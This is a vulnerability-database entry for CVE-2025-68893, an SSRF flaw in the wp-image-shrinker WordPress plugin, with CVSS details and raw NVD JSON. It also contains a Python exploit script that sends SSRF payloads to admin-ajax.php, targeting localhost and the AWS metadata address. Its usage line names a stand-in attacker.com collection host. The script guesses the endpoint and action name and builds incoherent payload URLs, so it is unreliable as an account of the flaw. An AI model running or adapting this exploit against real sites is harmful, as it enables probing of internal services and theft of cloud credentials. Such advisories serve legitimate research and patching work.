Security Vulnerability Report
中文
CVE-2025-68893 CVSS 4.9 MEDIUM

CVE-2025-68893

Published: 2025-12-29 16:15:43
Last Modified: 2026-04-23 15:36:12

Description

Server-Side Request Forgery (SSRF) vulnerability in HETWORKS WordPress Image shrinker wp-image-shrinker allows Server Side Request Forgery.This issue affects WordPress Image shrinker: from n/a through <= 1.1.0.

CVSS Details

CVSS Score
4.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

wp-image-shrinker <= 1.1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-68893 PoC - WordPress Image shrinker SSRF """ import requests import sys def exploit_ssrf(target_url, attacker_server): """ Exploit SSRF vulnerability in WordPress Image shrinker plugin target_url: URL of the WordPress site attacker_server: Your controlled server to receive SSRF requests """ # Target endpoint (typical WordPress admin ajax endpoint) endpoint = f"{target_url}/wp-admin/admin-ajax.php" # SSRF payload targeting internal resources payloads = [ f"http://localhost/{attacker_server}", f"http://127.0.0.1/{attacker_server}", f"http://169.254.169.254/{attacker_server}" # AWS metadata ] for payload in payloads: data = { 'action': 'wp_image_shrinker', # Plugin action 'image_url': payload, 'quality': '80' } try: print(f"[*] Sending payload: {payload}") response = requests.post(endpoint, data=data, timeout=10) print(f"[*] Response status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Request failed: {e}") if __name__ == "__main__": if len(sys.argv) < 3: print(f"Usage: {sys.argv[0]} <target_url> <attacker_server>") print(f"Example: {sys.argv[0]} http://victim.com http://attacker.com/collect") sys.exit(1) target_url = sys.argv[1] attacker_server = sys.argv[2] exploit_ssrf(target_url, attacker_server)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68893", "sourceIdentifier": "[email protected]", "published": "2025-12-29T16:15:43.303", "lastModified": "2026-04-23T15:36:11.857", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Server-Side Request Forgery (SSRF) vulnerability in HETWORKS WordPress Image shrinker wp-image-shrinker allows Server Side Request Forgery.This issue affects WordPress Image shrinker: from n/a through <= 1.1.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/wp-image-shrinker/vulnerability/wordpress-wordpress-image-shrinker-plugin-1-1-0-server-side-request-forgery-ssrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}